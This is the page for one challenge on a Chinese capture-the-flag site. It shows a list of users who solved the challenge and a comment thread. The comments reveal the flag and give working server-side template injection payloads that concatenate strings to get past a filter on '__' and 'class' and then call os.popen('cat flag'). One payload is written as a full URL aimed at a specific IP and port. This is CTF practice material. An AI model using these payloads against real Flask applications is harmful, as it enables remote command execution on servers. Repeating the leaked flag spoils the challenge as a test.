评分(0)
暂无评分
解题动态
fnuafhioun 攻破了该题 2天前
111lsg 攻破了该题 11天前
倦鸟叫了一整天 攻破了该题 18天前
tianna 攻破了该题 18天前
littlebear4 攻破了该题 26天前
coldplay99999 攻破了该题 1月前
Vissio 攻破了该题 1月前
Zhumeng 攻破了该题 1月前
dddflag 攻破了该题 1月前
15824777912 攻破了该题 2月前
sraiL 攻破了该题 2月前
shrinp 攻破了该题 2月前
yaozhiwang 攻破了该题 2月前
Timeo 攻破了该题 2月前
bugbiubiubiu 攻破了该题 2月前
1483541078 攻破了该题 2月前
2111300366 攻破了该题 3月前
2962470513 攻破了该题 3月前
hack轩 攻破了该题 3月前
评论
杰小小勇闯天涯 2月前
举报
0xGame{fl4sk_sst1_ju5t_5o_s0,r1ght?} ?
yaozhiwang 2月前
举报
0xGame{fl4sk_sst1_ju5t_5o_s0,r1ght?}
xiaobai568 7月前
举报
wp可参考https://ctf.bugku.com/writeup/detail/id/1203.html
WCRH 7月前
举报
首先无脑尝试几个语句,很容易发现__被过滤,那就字符串拼接(其实还有class被过滤,这个比较难发现,只能一个个尝试)
单手压FL 9月前
举报
search={{url_for['_'+'_'+'globals'+'_'+'_']['os'].popen('cat flag').read()}}
jz1111 1年前
举报
http://82.157.146.43:18893/?search={{config['_'+'_'+'c'+'l'+'a'+'s'+'s'+'_'+'_']['_'+'_'+'init'+'_'+'_']['_'+'_'+'globals'+'_'+'_']['os'].popen('cat flag').read()}}
2728462336 1年前
举报
爆出传参search,利用字符串拼接绕过